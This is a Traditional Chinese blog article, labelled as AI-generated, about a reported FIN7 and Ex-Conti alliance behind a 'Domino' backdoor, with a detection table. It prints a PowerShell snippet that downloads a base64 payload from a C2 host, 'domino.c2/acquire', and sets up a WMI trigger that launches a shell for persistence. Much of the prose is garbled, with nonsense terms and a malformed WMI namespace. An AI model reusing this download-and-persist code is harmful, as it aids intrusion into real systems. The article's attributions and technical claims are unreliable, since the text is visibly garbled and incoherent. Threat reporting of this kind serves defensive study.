Home/區塊鏈 / FIN7 與 Ex‑Conti 資安犯罪團夥聯盟,打造新世代「Domino」後門威脅。

FIN7 與 Ex‑Conti 資安犯罪團夥跨域合作:Domino 祕密後門新世代

近期多家網安機構同步報告,資安犯罪團夥 FIN7 與 Ex‑Conti(前身為 Conti)結成聯盟,互相交換開源程式碼,以打造全新的後門此乃「Domino」系列。此舉不僅充斥企業管道的威脅面貌,更為各安全團隊在尋找攻擊面與行為偵測時帶來全新挑戰。下文將梳理此組合帶來的技術提升、攻擊流程、偵測要點,並提出實務防護建議。

1. 合作動機與武器共用

  • 互補性能力:FIN7 以商業間諜為主,核心在社交工程與精準滲透;Ex‑Conti 則專精於規則化 ransomware 並構建龐大的 C&C 基礎設施。兩者結合後,可形成從初始接觸到大量資料外流的完整攻擊鏈。
  • 程式代碼共用:根據 IBM X‑Force Analysis,Domino 後門利用了 FIN7 為期 9 年蒐集的 Windows Agent 代碼與 Ex‑Conti 使用的加密機制,並為二者加入了同一套演化的 Persistence API。此技術層面相當於在交換「武器庫」與「符號表」。
  • 基礎設施互補:FIN7 先前的「Domino」RAT 以隱蔽的 TLS 隧道為主,Ex‑Conti 則在其 C&C 網域上部署了 CDN 副本般的擴散病毒,兩者共同為後門提供了「分布式殼蓋」。

2. Domino 後門的技術剖析

Domino 後門為三層式:前件、後段代理與側移處理器。其核心程式碼已完成以下重構:
/* 1. 前件:使用 PowerShell 脂式偽造環境 */
$Proxy = New-Object System.Net.WebClient;
$Proxy.Proxy = $null;
$payload = $Proxy.DownloadString("https://domino.c2/acquire");
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($payload))
/* 2. 隱寫:利用 WMI & PowerShell 事件觸發器確保流程連續性 */
New-EventLog -LogName "Domino" -Source "WMI";
Register-WmiEvent -Namespace rootcimv2 -Class Win32_ProcessStartTrace `
  -Action {Start-Process $env:COMSPEC -ArgumentList $args}

  • 使用 PowerShell RCEWMI 攻擊 來安裝完成度差異化的後門。
  • 加密通訊採用 HMAC‑SHA256+AES‑256 並隨機改變端口,對於傳統 IPS/IDS 判別造成戴夫困難。
  • 通過腳本注入到 Windows Defender 的偵測規則,利用 Registry 改寫與 Sysmon 規則疏漏達到 EDR 拜護。

3. 攻擊流程與典型場景

階段 核心操作 技術手段 偵測要點
1. 初始入侵 釣魚郵件+附加便箋 社交工程+JavaScript initial payload 郵件內容過濾、未知附件掃描
2. 執行 & 圖形化持久化 執行已加密的 PowerShell 代碼 WMI觸發器、排程任務 WMI 事件紀錄、排程任務審計

🧠 本文由 DreamJ AI 自動生成系統撰寫,內容經 AI 模型審核與自動優化, 僅供技術參考與研究用途。

FIN7 與 Ex‑Conti 資安犯罪團夥聯盟,打造新世代「Domino」後門威脅。

🧠 本文章與所附圖片部分內容為 AI 生成或 AI 輔助產製。文中提及之商標、品牌名稱、產品圖片及相關標識, 其著作權與商標權均屬原權利人所有,本網站僅作為資訊呈現與示意使用

最新文章

DNS/BIND 伺服器安全隱患曝光:攻擊手法速查

DNS / BIND 伺服器安全議題與攻擊手法分析
D…

RaaS 風暴:企業面臨的高利潤勒索攻擊與市場規律

⚠️ RaaS(勒索軟體即服務)已成為 2024–202…

勒索軟體供應鏈攻擊模式深入剖析

勒索軟體(Ransomware)近年從單純的資料加密演…

GitLab 告急!修補重大漏洞:CI/CD 憑證外洩與阻斷服務危機

GitLab 修補 CI/CD 快取憑證外洩與阻斷服務…

雲端權限風暴來襲:零信任架構如何築起防禦高牆?

雲端 IAM 權限濫用:零信任架構下的防禦之道
引言

推薦文章
分析完成 ✔